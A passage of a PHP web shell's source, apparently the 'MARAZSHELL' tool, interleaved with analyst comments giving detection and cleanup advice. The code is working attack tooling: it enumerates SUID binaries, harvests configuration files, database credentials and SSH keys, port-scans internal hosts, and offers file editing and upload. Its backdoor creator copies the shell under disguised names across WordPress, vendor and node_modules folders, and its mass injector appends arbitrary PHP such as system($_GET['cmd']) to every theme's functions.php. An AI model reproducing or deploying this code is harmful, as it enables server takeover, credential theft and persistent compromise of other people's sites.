<p style="font-size: 12px; color: var(--text-dim); margin-bottom: 15px;">Scanning for binaries with the SUID bit set (potential escalation vectors).</p>
<pre style="max-height: 200px; overflow: auto; font-size: 11px; background: rgba(0,0,0,0.2); padding: 10px;"><?= root_exec('find /usr/bin /usr/sbin -perm -4000 -size -2M 2>/dev/null | head -n 15') ?></pre>
</div>
</div>
<div class="right-col">
<div class="card" style="height: 100%;">
<h3 style="margin-bottom: 20px;"><i class="fas fa-history text-primary"></i> Exploit Log</h3>
<div id="log-container" style="background: #000; height: 400px; padding: 15px; border-radius: 8px; font-family: 'JetBrains Mono', monospace; font-size: 11px; overflow-y: auto; color: #aaa; border: 1px solid #333;">
<?php
if (isset($_SESSION['root_log'])) {
foreach ($_SESSION['root_log'] as $log) {
echo "<div>" . htmlspecialchars($log) . "</div>";
}
} else {
echo "<div class='text-dim'>Standing by for operations...</div>";
}
?>
</div>
<div style="margin-top: 20px;">
<form method="post">
<input type="hidden" name="action" value="auto_root">
<button type="submit" class="btn btn-primary" style="width: 100%; justify-content: center;">
<i class="fas fa-bolt"></i> RUN AUTO-ROOT
</button>
</form>
<button class="btn" style="width: 100%; margin-top: 10px; justify-content: center;" onclick="window.location.href='?linr00t&clear_log=1'">
<i class="fas fa-trash-alt"></i> CLEAR LOG
</button>
</div>
</div>
</div>
</div>
<?php
if (isset($_GET['clear_log'])) {
$_SESSION['root_log'] = [];
header("Location: ?linr00t"); exit;
}
?>
<?php elseif(isset($_GET['scan'])): ?>
<div class="title-section">
<h1>BACKDOOR <span>SCANNER</span></h1>
<p style="color: var(--text-dim);">Advanced Heuristic & Pattern Based Analysis</p>
</div>
<div class="card">
<div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 25px;">
<div>
<h3 style="margin-bottom: 5px;"><i class="fas fa-shield-alt text-primary"></i> System Integrity Check</h3>
<?php $scan_base = root_find_scan_base(); ?>
<p style="font-size: 13px; color: var(--text-dim);">Auto-Detected Root: <span class="text-accent"><?= htmlspecialchars($scan_base) ?></span></p>
</div>
<button class="btn btn-primary" onclick="window.location.href='?scan&do_scan=1'">
<i class="fas fa-play"></i> START FULL SCAN
</button>
</div>
<?php if (isset($_GET['do_scan'])): ?>
<?php
// Runs the shell's built-in file scanner from the auto-detected base directory
// and sorts the findings by score, highest first. root_find_scan_base() and
// root_scanner_scan() are defined elsewhere in the file; the second is assumed
// to fill $results by reference with 'path', 'score', 'matches' and 'size'
// entries, which are the keys the table below reads.
// Defender note: a "backdoor scanner" inside a web shell is typically used by
// the operator to locate other implants on the same host. Its presence does not
// make the file a security tool, and a request for ?scan&do_scan=1 in access
// logs marks a time at which the whole tree under the base directory was read.
$results = [];
$scan_base = root_find_scan_base();
root_scanner_scan($scan_base, $results);
usort($results, function($a, $b) { return $b['score'] - $a['score']; });
?>
<div style="margin-bottom: 20px;">
<span class="badge-system">FILES CHECKED: UNLIMITED</span>
<span class="badge-system" style="margin-left: 10px;">THREATS FOUND: <?= count($results) ?></span>
</div>
<table class="data-table">
<thead>
<tr><th>Danger</th><th>File Path</th><th>Detected Patterns</th><th>Size</th><th>Action</th></tr>
</thead>
<tbody>
<?php foreach($results as $r):
$color = $r['score'] >= 50 ? 'var(--primary)' : ($r['score'] >= 30 ? 'orange' : 'var(--accent)');
?>
<tr>
<td>
<div style="display: flex; align-items: center; gap: 8px;">
<div style="width: 10px; height: 10px; border-radius: 50%; background: <?= $color ?>; box-shadow: 0 0 10px <?= $color ?>;"></div>
<b style="color: <?= $color ?>;"><?= $r['score'] ?>%</b>
</div>
</td>
<td><span style="font-size: 11px; word-break: break-all;"><?= htmlspecialchars($r['path']) ?></span></td>
<td>
<div style="display: flex; flex-wrap: wrap; gap: 4px;">
<?php foreach($r['matches'] as $m): ?>
<span style="background: rgba(255,255,255,0.05); padding: 2px 5px; border-radius: 3px; font-size: 9px;"><?= htmlspecialchars($m) ?></span>
<?php endforeach; ?>
</div>
</td>
<td style="font-size: 11px;"><?= formatSizeUnits($r['size']) ?></td>
<td>
<a href="?p=<?= encodePath(dirname($r['path'])) ?>&e=<?= urlencode(basename($r['path'])) ?>" class="btn btn-sm"><i class="fas fa-code"></i> Edit</a>
</td>
</tr>
<?php endforeach; if(empty($results)): ?>
<tr><td colspan="5" style="text-align: center; padding: 50px; color: var(--text-dim);">No suspicious files found in this directory.</td></tr>
<?php endif; ?>
</tbody>
</table>
<?php else: ?>
<div style="text-align: center; padding: 60px; border: 2px dashed var(--border); border-radius: 12px;">
<i class="fas fa-search-plus" style="font-size: 3rem; color: var(--border); margin-bottom: 20px; display: block;"></i>
<h4 style="color: var(--text-dim);">Click the button above to start a deep recursive scan.</h4>
<p style="font-size: 12px; color: rgba(255,255,255,0.2); margin-top: 10px;">The scanner looks for eval, exec, base64, and other shell-like patterns used in backdoors.</p>
</div>
<?php endif; ?>
</div>
<?php if(isset($_POST['mass_infect'])):
// Persistence handler, reachable inside the ?scan view when a POST carries
// mass_infect: walks the scan base recursively and appends the POSTed
// infect_code, wrapped in a new PHP tag pair, to every file named functions.php
// whose real path contains wp-content/themes. Files that already contain the
// marker string 'MARAZSHELL_SIG' are skipped. The form that submits this is not
// in this part of the file.
// Impact: one request can modify every WordPress theme under the base
// directory, so removing this shell file alone does not clean the host.
// Detection and cleanup:
//  - file-integrity monitoring on wp-content/themes/*/functions.php; many such
//    files sharing one modification time is a strong signal;
//  - compare each theme's functions.php with the vendor copy and look for code
//    added after the original end of the file;
//  - search for the marker string above, noting that it is only present if the
//    operator's payload included it;
//  - restore themes from a known-good source instead of editing in place.
// Hardening: make theme directories read-only for the PHP user.
$code = $_POST['infect_code'];
$count_fnc = 0;
$scan_root = root_find_scan_base();
try {
$it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($scan_root, RecursiveDirectoryIterator::SKIP_DOTS));
foreach($it as $f) {
$nm = $f->getFilename();
$p = $f->getRealPath();
if($nm == 'functions.php' && strpos($p, 'wp-content' . DIRECTORY_SEPARATOR . 'themes') !== false) {
$c = @file_get_contents($p);
// Empty or unreadable files are skipped along with already-marked ones.
if($c && strpos($c, 'MARAZSHELL_SIG') === false) {
// The whole file is rewritten with the payload appended; the counter is
// incremented without checking whether the write succeeded.
@file_put_contents($p, $c . "\n<?php " . $code . " ?>");
$count_fnc++;
}
}
}
// Traversal errors (for example unreadable directories) end the walk silently.
} catch(Exception $e) {}
echo "<div class='card status-on'>Infected $count_fnc WordPress theme functions.php files!</div>";
endif; ?>
<?php elseif(isset($_GET['configs'])): ?>
<div class="title-section">
<h1>CONFIG <span>GRABBER</span></h1>
<p style="color: var(--text-dim);">Automated Sensitive Data Extraction</p>
</div>
<div class="card">
<table class="data-table">
<thead><tr><th>File</th><th>Type</th><th>Size</th><th>Action</th></tr></thead>
<tbody>
<?php
// Analyst note: builds the list of configuration and secret files shown in the
// "CONFIG GRABBER" table. Two discovery passes feed $found_configs: a shell `find`
// and, when that returns fewer than five paths, a PHP directory walk.
// $patterns is used only by the fallback walk below.
$patterns = ['wp-config.php', '.env', 'configuration.php', 'config.php', 'db.php', 'database.php', 'settings.php', '.htpasswd', '.bash_history', 'web.config', 'id_rsa', '.sql', 'backup.sql', 'ssh_config', 'config.json'];
$base = root_find_scan_base();
$found_configs = [];
// Pass 1: shell command run through root_exec() (defined elsewhere in this file).
// $base is placed in the command line without quoting. The search is limited to
// depth 8 and the first 50 output lines; stderr is discarded.
$res = root_exec("find $base -maxdepth 8 -type f \( -name '*.env' -o -name 'wp-config.php' -o -name 'config*.php' -o -name 'database.php' -o -name '.bash_history' -o -name 'web.config' -o -name 'id_rsa' \) -size -1M 2>/dev/null | head -n 50");
if($res) {
foreach(explode("\n", trim($res)) as $path) if($path && @file_exists($path)) $found_configs[] = realpath($path);
}
// Pass 2: fallback walk, depth 5, files smaller than 1048576 bytes.
if(count($found_configs) < 5) {
try {
$di = new RecursiveDirectoryIterator($base, RecursiveDirectoryIterator::SKIP_DOTS);
$it = new RecursiveIteratorIterator($di);
$it->setMaxDepth(5);
foreach($it as $file) {
if($file->isFile() && $file->getSize() < 1048576) {
$fn = $file->getFilename();
foreach($patterns as $pat) {
// Case-insensitive substring match on the file name, so e.g. '.sql' matches any
// name that contains ".sql", not only files with that extension.
if(stripos($fn, str_replace('*','',$pat)) !== false) {
$found_configs[] = $file->getRealPath();
break;
}
}
}
// Stops collecting once more than 100 paths are held.
if(count($found_configs) > 100) break;
}
} catch(Exception $e) {}
}
// Incident response: the table rendered from this list links each path to the shell's
// file viewer, so secrets in any file of these types under the scan base should be
// treated as exposed and rotated.
$found_configs = array_unique($found_configs);
foreach($found_configs as $path): ?>
<tr>
<td><span style="font-size:11px;"><?= htmlspecialchars($path) ?></span></td>
<td><span class="badge-system"><?= strtoupper(pathinfo($path, PATHINFO_EXTENSION) ?: 'HINT') ?></span></td>
<td><?= @formatSizeUnits(@filesize($path)) ?></td>
<td>
<div style="display: flex; gap: 5px;">
<a href="?p=<?= encodePath(dirname($path)) ?>&e=<?= urlencode(basename($path)) ?>" class="btn btn-sm"><i class="fas fa-eye"></i> View</a>
<a href="?p=<?= encodePath(dirname($path)) ?>" class="btn btn-sm"><i class="fas fa-folder"></i> Path</a>
</div>
</td>
</tr>
<?php endforeach; if(empty($found_configs)): ?>
<tr><td colspan="4" style="text-align: center; padding: 50px; color: var(--text-dim);">No sensitive files found in <?= htmlspecialchars($base) ?></td></tr>
<?php endif; ?>
</tbody>
</table>
</div>
<?php elseif(isset($_GET['portscan'])): ?>
<div class="title-section">
<h1>PORT <span>SCANNER</span></h1>
<p style="color: var(--text-dim);">Internal Network Reconnaissance</p>
</div>
<div class="card">
<form method="post">
<div style="display: flex; gap: 10px; margin-bottom: 20px;">
<input type="text" name="target_host" value="127.0.0.1" placeholder="Target IP/Host" style="flex:2;">
<input type="text" name="target_ports" value="21,22,80,443,3306,3389,8080" placeholder="Ports (comma separated)" style="flex:3;">
<button type="submit" name="do_portscan" class="btn btn-primary">SCAN</button>
</div>
</form>
<?php if(isset($_POST['do_portscan'])): ?>
<div style="display: grid; grid-template-columns: repeat(auto-fill, minmax(120px, 1fr)); gap: 10px;">
<?php
// Analyst note: TCP connect probe issued from the web server itself. Host and port
// list come straight from the POST fields target_host and target_ports, so hosts
// reachable only from the server's network position can be probed.
// Detection: short-lived outbound connections from the PHP worker to several ports
// on one host, each with a 0.5 second timeout, following a POST that carries `do_portscan`.
$host = $_POST['target_host'];
$ports = explode(',', $_POST['target_ports']);
foreach($ports as $port):
$port = trim($port);
$fp = @fsockopen($host, $port, $errno, $errstr, 0.5);
$status = $fp ? 'status-on' : 'status-off';
// The socket is closed immediately; nothing is sent or read on it.
if($fp) fclose($fp);
// $port is echoed into the page without HTML escaping.
echo "<div class='badge-system' style='padding:10px; text-align:center;'>Port $port: <span class='$status'>" . ($fp ? 'OPEN' : 'CLOSED') . "</span></div>";
endforeach;
?>
</div>
<?php endif; ?>
</div>
<?php elseif(isset($_GET['b4ckd00rcr3at3'])): ?>
<div class="title-section">
<h1>BACKDOOR <span>CREATOR</span></h1>
<p style="color: var(--text-dim);">Recursive Stealth Injection & Persistence</p>
</div>
<div class="card">
<h3 style="margin-bottom: 20px;"><i class="fas fa-biohazard text-primary"></i> Multi-Point Infection Engine</h3>
<p style="margin-bottom: 20px; font-size: 14px; color: var(--text-dim);">This module will clone the entire shell and spread it into randomized, deep directories (prioritizing WordPress core/plugin folders) to ensure persistence.</p>
<form method="post" style="display: flex; gap: 10px;">
<button type="submit" name="create_bd" class="btn btn-primary" style="padding: 15px 30px; font-weight: bold; flex: 1;">
<i class="fas fa-bolt"></i> INITIATE GLOBAL INFECTION
</button>
</form>
<div style="margin-top: 40px; padding-top: 20px; border-top: 1px dashed var(--border);">
<h3 style="margin-bottom: 15px;"><i class="fas fa-microchip text-primary"></i> WP Deep Core Persistence</h3>
<p style="font-size: 13px; color: var(--text-dim); margin-bottom: 15px;">Injects an encrypted self-healing "Guard" into deep WordPress files (wp-includes). This will monitor and recreate `hedef.php` if it gets deleted, with Telegram alert.</p>
<form method="post">
<button type="submit" name="wp_deep_persistence" class="btn btn-accent" style="width: 100%; justify-content: center; height: 50px; font-weight: bold;">
<i class="fas fa-shield-virus"></i> DEPLOY DEEP PERSISTENCE
</button>
</form>
</div>
<div style="margin-top: 40px; padding-top: 20px; border-top: 1px dashed var(--border);">
<h3 style="margin-bottom: 15px;"><i class="fas fa-ghost text-primary"></i> Stealth BozCloak (Cloaking & Hide)</h3>
<p style="font-size: 13px; color: var(--text-dim); margin-bottom: 15px;">Injects a Stealth Cloaking plugin into `mu-plugins`. This hides `mu-plugins` from the dashboard and provides Google-bot cloaking with a hidden editor.</p>
<form method="post">
<button type="submit" name="wp_stealth_cloak" class="btn btn-accent" style="width: 100%; justify-content: center; height: 50px; font-weight: bold; background: #222;">
<i class="fas fa-mask"></i> DEPLOY STEALTH CLOAK
</button>
</form>
</div>
<div style="margin-top: 40px; padding-top: 20px; border-top: 1px dashed var(--border);">
<h3 style="margin-bottom: 15px;"><i class="fas fa-syringe text-primary"></i> Mass Theme Injector</h3>
<p style="font-size: 13px; color: var(--text-dim); margin-bottom: 15px;">Injects code into every WordPress theme `functions.php` file found on the server.</p>
<form method="post">
<textarea name="infect_code" style="height: 100px; margin-bottom: 15px;" placeholder="PHP code to inject... (e.g. system($_GET['cmd']);)"></textarea>
<button type="submit" name="mass_infect" class="btn btn-danger" style="width: 100%; justify-content: center;">
<i class="fas fa-biohazard"></i> RUN THEME INFECTION
</button>
</form>
</div>
<?php
// Analyst note: persistence routine behind the `create_bd` POST button. It reads this
// file's own source and writes copies into a random selection of directories under the
// document root. Hunting guidance for responders is given inline below.
if (isset($_POST['create_bd'])) {
// The payload is the running file itself, read via __FILE__.
$self_content = @file_get_contents(__FILE__);
$base_dir = rtrim($_SERVER['DOCUMENT_ROOT'] ?? getcwd(), '/');
$potential_targets = [];
try {
if (class_exists('RecursiveDirectoryIterator')) {
$it = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($base_dir, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($it as $file) {
if ($file->isDir()) {
$p = $file->getRealPath();
// Candidate directories: any whose real path contains "wp-", "node_modules" or "vendor".
if ($p && (strpos($p, 'wp-') !== false || strpos($p, 'node_modules') !== false || strpos($p, 'vendor') !== false)) {
$potential_targets[] = $p;
}
}
// Collection stops once more than 500 candidates are held.
if (count($potential_targets) > 500) break;
}
}
} catch (Exception $e) { }
// Fallback when nothing matched: the document root and its immediate subdirectories.
if (empty($potential_targets)) {
$potential_targets = [$base_dir];
foreach (glob($base_dir . '/*', GLOB_ONLYDIR) as $d) $potential_targets[] = $d;
}
// Between 6 and 10 directories are chosen at random per run.
shuffle($potential_targets);
$selected = array_slice($potential_targets, 0, rand(6, 10));
// Hunt list: the dropped copies use one of these ten file names, picked independently
// for each directory, so the same name can appear in several places.
$stealth_names = [
'class-wp-util.php', 'wp-db-manager.php', 'admin-ajax-cache.php',
'wp-core-debug.php', 'class.wp-scripts.php', 'file-manager-internal.php',
'wp-load-extra.php', 'security-check.php', 'compat-fix.php', 'wp-sys-init.php'
];
echo "<div style='margin-top: 30px; padding: 20px; background: rgba(0,0,0,0.2); border-left: 4px solid var(--primary); border-radius: 8px;'>";
echo "<h4 style='margin-bottom: 15px;'>Infection Report:</h4>";
$results = [];
foreach ($selected as $dir) {
$fname = $stealth_names[array_rand($stealth_names)];
$full_path = $dir . DIRECTORY_SEPARATOR . $fname;
// root_write_file() is defined elsewhere in this file. Presumably the content is written
// unchanged, in which case a hash of this shell finds every copy; confirm against that
// helper before relying on a hash sweep alone.
if (root_write_file($full_path, $self_content)) {
// The remaining lines of this branch only derive a clickable URL for the report.
$root_doc = realpath($_SERVER['DOCUMENT_ROOT'] ?? getcwd());
$rel_url = str_replace($root_doc, '', realpath($full_path));
$rel_url = str_replace('\\', '/', $rel_url);
if (substr($rel_url, 0, 1) !== '/') $rel_url = '/' . $rel_url;
$protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] == 443) ? "https://" : "http://";
$host = $_SERVER['HTTP_HOST'] ?? 'localhost';
$full_url = $protocol . $host . $rel_url;
$results[] = "<span style='color: #0f0;'>[SUCCESS]</span> <a href='$full_url' target='_blank' style='color: var(--accent); font-weight: bold;'>$full_url</a>";
} else {
$results[] = "<span style='color: #f00;'>[FAILED]</span> " . htmlspecialchars($full_path) . " (Permission Denied)";
}
}
echo implode("<br>", $results);
echo "</div>";
}
?>
</div>
<?php elseif(isset($_GET['configs'])): ?>
<div class="title-section">
<h1>CONFIG <span>GRABBER</span></h1>
<p style="color: var(--text-dim);">Automated Credential Discovery Engine</p>
<button class="btn btn-primary" onclick="window.location.href='?configs&scan=1'"><i class="fas fa-search"></i> START SYSTEM SCAN</button>
</div>
<?php if(isset($_GET['scan'])): ?>
<div class="card" style="margin-bottom: 20px;">
<h3 style="margin-bottom: 15px; font-size: 14px;"><i class="fas fa-satellite-dish"></i> Scanning Server for Configs...</h3>
<div style="font-size: 11px; color: var(--text-dim);">Searching in: <?= htmlspecialchars(root_find_scan_base()) ?></div>
</div>
<?php
// Analyst note: credential extraction view. root_find_all_configs() and
// root_extract_creds() are defined elsewhere in this file; from the way the result is
// rendered, each non-empty result is an array with the keys type, file, host, user,
// pass and db.
// NOTE(review): this branch tests the same `configs` GET key as an earlier elseif in the
// same if-chain, so it appears unreachable as written; confirm against the full file
// before concluding that credential extraction never ran.
$all_files = root_find_all_configs(root_find_scan_base());
$found_creds = [];
foreach($all_files as $f) {
$creds = root_extract_creds($f);
if ($creds) $found_creds[] = $creds;
}
if (empty($found_creds)): ?>
<div class="card" style="text-align: center; color: var(--danger);">No configuration credentials could be extracted.</div>
<?php else: ?>
<div style="display: grid; grid-template-columns: repeat(auto-fill, minmax(350px, 1fr)); gap: 20px;">
<?php foreach($found_creds as $c): ?>
<div class="card" style="border-left: 4px solid var(--accent); position: relative;">
<div style="position: absolute; top: 15px; right: 15px;">
<span class="badge-system" style="background: rgba(0, 112, 243, 0.1); color: var(--accent);"><?= $c['type'] ?></span>
</div>
<h4 style="margin-bottom: 15px; font-size: 13px; max-width: 80%;"><?= basename(dirname($c['file'])) ?> <span style="font-weight: normal; color: var(--text-dim); font-size: 10px;">/ <?= basename($c['file']) ?></span></h4>
<div style="font-family: 'JetBrains Mono', monospace; font-size: 11px; margin-bottom: 20px;">
<div style="margin-bottom: 4px;"><span style="color: var(--text-muted);">Host:</span> <?= htmlspecialchars($c['host']) ?></div>
<div style="margin-bottom: 4px;"><span style="color: var(--text-muted);">User:</span> <span style="color: var(--primary);"><?= htmlspecialchars($c['user']) ?></span></div>
<div style="margin-bottom: 4px;"><span style="color: var(--text-muted);">Pass:</span> <span style="color: var(--success);"><?= htmlspecialchars($c['pass']) ?: '<em>Empty</em>' ?></span></div>
<div style="margin-bottom: 4px;"><span style="color: var(--text-muted);">DB:</span> <span style="color: var(--accent); font-weight: bold;"><?= htmlspecialchars($c['db']) ?></span></div>
</div>
<div style="display: flex; gap: 10px;">
<button class="btn btn-sm" style="flex: 1;" onclick="connectDB('<?= addslashes($c['host']) ?>','<?= addslashes($c['user']) ?>','<?= addslashes($c['pass']) ?>','<?= addslashes($c['db']) ?>')">CONNECT</button>
<?php if($c['type'] == 'WordPress'): ?>
<button class="btn btn-sm" style="background: #21759b; color:#fff;" onclick="window.location.href='?wp&manual_wp_path=<?= urlencode(dirname($c['file'])) ?>'">WP LOGIN</button>
<?php endif; ?>
<a href="?p=<?= encodePath(dirname($c['file'])) ?>" class="btn btn-sm"><i class="fas fa-folder-open"></i></a>
</div>
</div>
<?php endforeach; ?>
</div>
<script>
// Analyst note: navigates to a GET URL that carries host, user, password and database
// name as the query parameters h, u, p and d. Requests of the form `?db&h=...&u=...&p=...`
// in access logs therefore typically contain the extracted credentials in clear text.
function connectDB(h,u,p,d) {
window.location.href = `?db&h=${encodeURIComponent(h)}&u=${encodeURIComponent(u)}&p=${encodeURIComponent(p)}&d=${encodeURIComponent(d)}`;
}
</script>
<?php endif; ?>
<?php else: ?>
<div class="card" style="text-align: center; padding: 60px;">
<i class="fas fa-key" style="font-size: 48px; color: var(--text-muted); margin-bottom: 20px;"></i>
<h3>Ready to Grab Configs</h3>
<p style="color: var(--text-dim); margin-top: 10px;">This module will aggressively search for database credentials in common web app configuration files.</p>
</div>
<?php endif; ?>
<?php elseif(isset($_GET['portscan'])): ?>
<div class="title-section">
<h1>PORT <span>SCANNER</span></h1>
<p style="color: var(--text-dim);">Internal Network Reconnaissance</p>
</div>
<div class="card">
<form method="post">
<div style="display: flex; gap: 10px; margin-bottom: 20px;">
<input type="text" name="target_host" value="127.0.0.1" placeholder="Target IP/Host" style="flex:2;">
<input type="text" name="target_ports" value="21,22,80,443,3306,3389,8080" placeholder="Ports (comma separated)" style="flex:3;">
<button type="submit" name="do_portscan" class="btn btn-primary">SCAN</button>
</div>
</form>
<?php if(isset($_POST['do_portscan'])): ?>
<div style="display: grid; grid-template-columns: repeat(auto-fill, minmax(120px, 1fr)); gap: 10px;">
<?php
// Analyst note: TCP connect probe against the POST-supplied target_host and target_ports,
// with a 0.5 second timeout per port.
// NOTE(review): the enclosing elseif tests the same `portscan` GET key as an earlier branch
// of the same if-chain, so this copy appears unreachable; confirm against the full file.
$host = $_POST['target_host'];
$ports = explode(',', $_POST['target_ports']);
foreach($ports as $port):
$port = trim($port);
$fp = @fsockopen($host, $port, $errno, $errstr, 0.5);
$status = $fp ? 'status-on' : 'status-off';
// The socket is closed immediately; nothing is sent or read on it.
if($fp) fclose($fp);
echo "<div class='badge-system' style='padding:10px; text-align:center;'>Port $port: <span class='$status'>" . ($fp ? 'OPEN' : 'CLOSED') . "</span></div>";
endforeach;
?>
</div>
<?php endif; ?>
</div>
<?php elseif(isset($_GET['e'])): ?>
<div class="title-section">
<h1>FILE <span>EDITOR</span></h1>
<a href="?p=<?= encodePath(PATH) ?>" class="btn">BACK</a>
</div>
<div class="card">
<form method="post">
<h3 style="margin-bottom: 15px;"><?= htmlspecialchars($_GET['e']) ?></h3>
<textarea name="content" style="height: 500px; font-family: 'JetBrains Mono', monospace; background: #000; border: 1px solid #333; font-size: 12px; line-height: 1.6; color: #00ff00;"><?= htmlspecialchars(file_get_contents(PATH . DIRECTORY_SEPARATOR . $_GET['e'])) ?></textarea>
<div style="margin-top: 20px; text-align: right;">
<button type="submit" name="edit" class="btn"><i class="fas fa-save"></i> SAVE FILE</button>
</div>
</form>
</div>
<?php elseif(isset($_GET['r'])): ?>
<div class="card" style="max-width: 500px; margin: 100px auto;">
<h2 style="margin-bottom: 20px;">RENAME ITEM</h2>
<form method="post">
<input type="text" name="new_name" value="<?= htmlspecialchars($_GET['r']) ?>" autofocus>
<div style="margin-top: 20px; display: flex; gap: 10px;">
<button type="submit" name="rename" class="btn btn-primary" style="flex: 1;">RENAME</button>
<a href="?p=<?= encodePath(PATH) ?>" class="btn" style="flex: 1;">CANCEL</a>
</div>
</form>
</div>
<?php else: ?>
<div class="title-section">
<h1>FILE <span>MANAGER</span></h1>
<div style="display: flex; gap: 10px;">
<button class="btn" onclick="toggle('create-panel')"><i class="fas fa-plus-circle"></i> NEW ENTRY</button>
<button class="btn btn-primary" onclick="toggle('upload-box')"><i class="fas fa-cloud-upload-alt"></i> Upload</button>
</div>
</div>
<div id="create-panel" class="card hidden animate__animated animate__fadeInDown">
<h3 style="margin-bottom: 15px;"><i class="fas fa-plus-circle text-primary"></i> Create New Item</h3>
<div style="display: grid; grid-template-columns: 1fr 150px; gap: 10px; margin-bottom: 15px;">
<input type="text" id="new_item_name" placeholder="Name (e.g. index.php or /assets)">
<select id="new_item_type" style="background: rgba(255,255,255,0.05); border: 1px solid var(--border); color: #fff; padding: 10px; border-radius: 6px;">
<option value="file">FILE</option>
<option value="folder">FOLDER</option>
</select>
</div>
<textarea id="new_item_content" style="height: 150px; margin-bottom: 15px;" placeholder="Initial content for the file..."></textarea>
<div style="display: flex; gap: 10px; justify-content: flex-end;">
<button class="btn" onclick="toggle('create-panel')">CANCEL</button>
<button class="btn btn-primary" onclick="submitCreate()">CREATE NOW</button>
</div>
<script>
// Analyst note: file/folder creation is sent as a multipart POST to this same script
// with `ajax` and `p` in the query string and the form fields fm_action (create_file or
// create_folder), name and, for files, content. POST requests to the shell's URL with
// `?ajax&p=` are therefore the log trace of items created through this panel.
function submitCreate() {
const name = document.getElementById('new_item_name').value;
const type = document.getElementById('new_item_type').value;
const content = document.getElementById('new_item_content').value;
if(!name) return alert('Name required');
const fd = new FormData();
fd.append('fm_action', type === 'file' ? 'create_file' : 'create_folder');
fd.append('name', name);
if(type === 'file') fd.append('content', content);
// The server answers with JSON holding `message` and `status`.
fetch('?ajax&p=<?= encodePath(PATH) ?>', { method: 'POST', body: fd }).then(r => r.json()).then(data => {
alert(data.message); if(data.status === 'success') window.location.reload();
});
}
</script>
</div>
<div class="breadcrumb">
<i class="fas fa-home"></i>
<?php
// Analyst note: renders one breadcrumb link per component of PATH (a constant defined
// elsewhere in this file). Each link's `p` value is produced by encodePath(), which,
// as defined at the top of the file, replaces "/", "\", "." and ":" with four Bengali
// letters. `p=` values containing those letters in access logs can be mapped back to
// the filesystem paths the operator browsed by reversing that substitution.
$parts = explode(DIRECTORY_SEPARATOR, PATH);
$built = '';
foreach($parts as $id => $part):
// Empty components (e.g. from a leading separator) are skipped.
if($part === '') continue;
$built .= ($id == 0 ? '' : DIRECTORY_SEPARATOR) . $part;
echo " <span style='opacity: 0.3;'>/</span> <a href='?p=".encodePath($built)."'>".htmlspecialchars($part)."</a>";
endforeach;
?>
</div>
<div id="upload-box" class="card hidden animate__animated animate__fadeInDown">
<form method="post" enctype="multipart/form-data">
<input type="file" name="fileToUpload" style="margin-bottom: 20px;">
<button type="submit" name="upload" class="btn btn-primary">START UPLOAD</button>
</form>
</div>
<div class="card" style="padding: 0; overflow: hidden;">
<table class="data-table">
<thead>
<tr><th>Name</th><th>Size</th><th>Date</th><th>Perms</th><th>Actions</th></tr>
</thead>
<tbody>
<?php
// Analyst note: directory listing for the file manager. Entries of PATH (a constant
// defined elsewhere in this file) are split into directories and files; the rows that
// follow link to the shell's edit, rename and delete actions through the `e`, `r` and
// `d` query parameters together with an encoded path in `q`, which is what those
// actions look like in access logs.
$items = scandir(PATH);
$dirs = []; $fs = [];
// "." and ".." are dropped; everything else is classified with is_dir().
foreach($items as $i) { if($i=='.'||$i=='..') continue; if(is_dir(PATH.DIRECTORY_SEPARATOR.$i)) $dirs[]=$i; else $fs[]=$i; }
foreach($dirs as $d): $p = PATH.DIRECTORY_SEPARATOR.$d;
?>
<tr>
<td><a href="?p=<?= encodePath($p) ?>" style="text-decoration:none; color:inherit; font-weight:bold;"><i class="fas fa-folder text-primary"></i> <?= htmlspecialchars($d) ?></a></td>
<td class="text-dim">--</td>
<td style="font-size: 11px;"><?= date("Y-m-d H:i", filemtime($p)) ?></td>
<td><span style="color: var(--accent);"><?= substr(sprintf('%o', fileperms($p)), -4) ?></span></td>
<td style="text-align: right; display: flex; gap: 5px; justify-content: flex-end;">
<a href="?q=<?= encodePath(PATH) ?>&r=<?= urlencode($d) ?>" class="btn btn-sm"><i class="fas fa-edit"></i></a>
<a href="?q=<?= encodePath(PATH) ?>&d=<?= urlencode($d) ?>" class="btn btn-sm btn-danger" onclick="return confirm('Delete?')"><i class="fas fa-trash"></i></a>
</td>
</tr>
<?php endforeach; ?>
<?php foreach($fs as $f): $p = PATH.DIRECTORY_SEPARATOR.$f; ?>
<tr>
<td><?= fileIcon($f) ?> <?= htmlspecialchars($f) ?></td>
<td style="font-size: 11px;"><?= formatSizeUnits(filesize($p)) ?></td>
<td style="font-size: 11px;"><?= date("Y-m-d H:i", filemtime($p)) ?></td>
<td><span style="color: var(--accent);"><?= substr(sprintf('%o', fileperms($p)), -4) ?></span></td>
<td style="text-align: right; display: flex; gap: 5px; justify-content: flex-end;">
<a href="?q=<?= encodePath(PATH) ?>&e=<?= urlencode($f) ?>" class="btn btn-sm"><i class="fas fa-code"></i></a>
<a href="?q=<?= encodePath(PATH) ?>&r=<?= urlencode($f) ?>" class="btn btn-sm"><i class="fas fa-edit"></i></a>
<a href="?q=<?= encodePath(PATH) ?>&d=<?= urlencode($f) ?>" class="btn btn-sm btn-danger" onclick="return confirm('Delete?')"><i class="fas fa-trash"></i></a>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
<?php endif; ?>
</main>
</div>
</body>
</html>